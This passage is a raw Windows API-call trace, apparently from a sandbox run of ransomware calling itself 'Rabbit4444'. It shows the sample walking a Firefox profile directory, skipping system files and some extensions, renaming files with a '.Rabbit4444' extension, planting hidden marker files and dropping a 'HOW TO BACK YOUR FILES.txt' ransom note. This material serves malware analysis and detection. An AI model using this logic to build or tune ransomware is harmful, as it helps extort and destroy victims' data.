lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\" [0051.967] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.BFC0E91B00AE8A0620D3" [0051.967] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0051.970] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0051.972] FlushFileBuffers (hFile=0x27c) returned 1 [0051.973] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.973] CloseHandle (hObject=0x27c) returned 1 [0051.974] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome") returned 98 [0051.974] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.974] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c2e4c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x246c9b2, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xe84d9b49, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0051.974] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.974] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.974] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0051.974] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.974] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c2e4c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x246c9b2, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xe84d9b49, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.974] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.974] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.974] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0051.974] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.974] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.974] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe84d9b49, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe84d9b49, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe84d9b49, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.975] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.975] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.975] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23c2e4c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x23c2e4c, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x23c41d5, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x1d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".metadata", cAlternateFileName="METADA~1")) returned 1 [0051.975] lstrcmpiW (lpString1=".metadata", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.975] lstrcmpiW (lpString1=".metadata", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.975] lstrcmpiW (lpString1=".metadata", lpString2="Rabbit4444.exe") returned -1 [0051.975] lstrcmpiW (lpString1=".metadata", lpString2=".") returned 1 [0051.975] lstrcmpiW (lpString1=".metadata", lpString2="..") returned 1 [0051.975] lstrcmpiW (lpString1=".metadata", lpString2="windows") returned -1 [0051.975] lstrcmpiW (lpString1=".metadata", lpString2="bootmgr") returned -1 [0051.975] lstrcmpiW (lpString1=".metadata", lpString2="pagefile.sys") returned -1 [0051.975] lstrcmpiW (lpString1=".metadata", lpString2="boot") returned -1 [0051.975] lstrcmpiW (lpString1=".metadata", lpString2="ids.txt") returned -1 [0051.975] lstrcmpiW (lpString1=".metadata", lpString2="NTUSER.DAT") returned -1 [0051.975] lstrcpyW (in: lpString1=0x130ebfe, lpString2=".metadata" | out: lpString1=".metadata") returned=".metadata" [0051.975] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.metadata", dwFileAttributes=0x0) returned 1 [0051.975] lstrlenW (lpString=".metadata") returned 9 [0051.975] lstrlenW (lpString="Rabbit4444") returned 10 [0051.975] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0051.975] lstrlenW (lpString=".dll") returned 4 [0051.975] lstrcmpiW (lpString1="data", lpString2=".dll") returned 1 [0051.975] lstrlenW (lpString=".lnk") returned 4 [0051.975] lstrcmpiW (lpString1="data", lpString2=".lnk") returned 1 [0051.975] lstrlenW (lpString=".ini") returned 4 [0051.975] lstrcmpiW (lpString1="data", lpString2=".ini") returned 1 [0051.976] lstrlenW (lpString=".sys") returned 4 [0051.976] lstrcmpiW (lpString1="data", lpString2=".sys") returned 1 [0051.976] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.metadata" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.metadata"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0051.976] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0051.976] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14328650798) returned 1 [0051.976] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=29) returned 1 [0051.976] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0051.976] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0051.976] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x298 [0051.977] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0x70000 [0051.978] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x10c928 [0051.978] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0051.978] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.978] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0051.978] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0051.978] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0051.978] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.978] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0051.978] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14328925185) returned 1 [0051.979] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0051.979] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0051.979] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0051.979] CloseHandle (hObject=0x298) returned 1 [0051.979] CloseHandle (hObject=0x278) returned 1 [0051.979] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.metadata.Rabbit4444") returned 119 [0051.979] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.metadata" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.metadata"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.metadata.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.metadata.rabbit4444"), dwFlags=0x1) returned 1 [0051.979] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2409b53, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x2409b53, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x240aee0, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x2a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".metadata-v2", cAlternateFileName="METADA~2")) returned 1 [0051.979] lstrcmpiW (lpString1=".metadata-v2", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.979] lstrcmpiW (lpString1=".metadata-v2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.979] lstrcmpiW (lpString1=".metadata-v2", lpString2="Rabbit4444.exe") returned -1 [0051.980] lstrcmpiW (lpString1=".metadata-v2", lpString2=".") returned 1 [0051.980] lstrcmpiW (lpString1=".metadata-v2", lpString2="..") returned 1 [0051.980] lstrcmpiW (lpString1=".metadata-v2", lpString2="windows") returned -1 [0051.980] lstrcmpiW (lpString1=".metadata-v2", lpString2="bootmgr") returned -1 [0051.980] lstrcmpiW (lpString1=".metadata-v2", lpString2="pagefile.sys") returned -1 [0051.980] lstrcmpiW (lpString1=".metadata-v2", lpString2="boot") returned -1 [0051.980] lstrcmpiW (lpString1=".metadata-v2", lpString2="ids.txt") returned -1 [0051.980] lstrcmpiW (lpString1=".metadata-v2", lpString2="NTUSER.DAT") returned -1 [0051.980] lstrcpyW (in: lpString1=0x130ebfe, lpString2=".metadata-v2" | out: lpString1=".metadata-v2") returned=".metadata-v2" [0051.980] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.metadata-v2", dwFileAttributes=0x0) returned 1 [0051.980] lstrlenW (lpString=".metadata-v2") returned 12 [0051.980] lstrlenW (lpString="Rabbit4444") returned 10 [0051.980] lstrcmpiW (lpString1="etadata-v2", lpString2="Rabbit4444") returned -1 [0051.980] lstrlenW (lpString=".dll") returned 4 [0051.980] lstrcmpiW (lpString1="a-v2", lpString2=".dll") returned 1 [0051.980] lstrlenW (lpString=".lnk") returned 4 [0051.980] lstrcmpiW (lpString1="a-v2", lpString2=".lnk") returned 1 [0051.980] lstrlenW (lpString=".ini") returned 4 [0051.980] lstrcmpiW (lpString1="a-v2", lpString2=".ini") returned 1 [0051.980] lstrlenW (lpString=".sys") returned 4 [0051.980] lstrcmpiW (lpString1="a-v2", lpString2=".sys") returned 1 [0051.980] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.metadata-v2" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.metadata-v2"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0051.981] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0051.981] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14329295974) returned 1 [0051.982] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=42) returned 1 [0051.982] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0051.982] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0051.982] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x330, lpName=0x0) returned 0x298 [0051.984] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x330) returned 0x70000 [0051.985] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x10c928 [0051.985] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0051.985] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.985] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0051.985] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0051.985] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0051.985] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.985] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0051.985] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14329591718) returned 1 [0051.985] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0051.985] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0051.985] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0051.985] CloseHandle (hObject=0x298) returned 1 [0051.985] CloseHandle (hObject=0x278) returned 1 [0051.985] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.metadata-v2.Rabbit4444") returned 122 [0051.986] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.metadata-v2" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.metadata-v2"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.metadata-v2.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.metadata-v2.rabbit4444"), dwFlags=0x1) returned 1 [0051.986] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x246c9b2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x7d09b9f, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xeffbe54, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="idb", cAlternateFileName="")) returned 1 [0051.986] lstrcmpiW (lpString1="idb", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.986] lstrcmpiW (lpString1="idb", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.986] lstrcmpiW (lpString1="idb", lpString2="Rabbit4444.exe") returned -1 [0051.986] lstrcmpiW (lpString1="idb", lpString2=".") returned 1 [0051.986] lstrcmpiW (lpString1="idb", lpString2="..") returned 1 [0051.986] lstrcmpiW (lpString1="idb", lpString2="windows") returned -1 [0051.986] lstrcmpiW (lpString1="idb", lpString2="bootmgr") returned 1 [0051.986] lstrcmpiW (lpString1="idb", lpString2="pagefile.sys") returned -1 [0051.986] lstrcmpiW (lpString1="idb", lpString2="boot") returned 1 [0051.986] lstrcmpiW (lpString1="idb", lpString2="ids.txt") returned -1 [0051.986] lstrcmpiW (lpString1="idb", lpString2="NTUSER.DAT") returned -1 [0051.986] lstrcpyW (in: lpString1=0x130ebfe, lpString2="idb" | out: lpString1="idb") returned="idb" [0051.986] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xea708 [0051.986] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xce) returned 0x108688 [0051.987] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xea710 | out: ListHead=0xf68b0, ListEntry=0xea710) returned 0xf6930 [0051.987] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x246c9b2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x7d09b9f, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xeffbe54, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="idb", cAlternateFileName="")) returned 0 [0051.987] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0051.987] lstrcpyW (in: lpString1=0x130ebfe, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.987] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0051.987] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0051.999] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0051.999] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0051.999] CloseHandle (hObject=0x278) returned 1 [0051.999] CloseHandle (hObject=0x27c) returned 1 [0052.002] GetCurrentThreadId () returned 0xd98 [0052.003] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xea710 [0052.005] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb" [0052.006] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108688 | out: hHeap=0xe0000) returned 1 [0052.006] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xea708 | out: hHeap=0xe0000) returned 1 [0052.006] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb" [0052.008] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\" [0052.010] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\.BFC0E91B00AE8A0620D3" [0052.011] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.014] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.017] FlushFileBuffers (hFile=0x27c) returned 1 [0052.017] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.018] CloseHandle (hObject=0x27c) returned 1 [0052.018] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb") returned 102 [0052.018] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.018] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\idb\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x246c9b2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xeffbe54, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe85263ac, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102590 [0052.018] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.018] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.018] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.018] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.018] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x246c9b2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xeffbe54, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe85263ac, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.019] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.019] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.019] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.019] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.019] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.019] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, 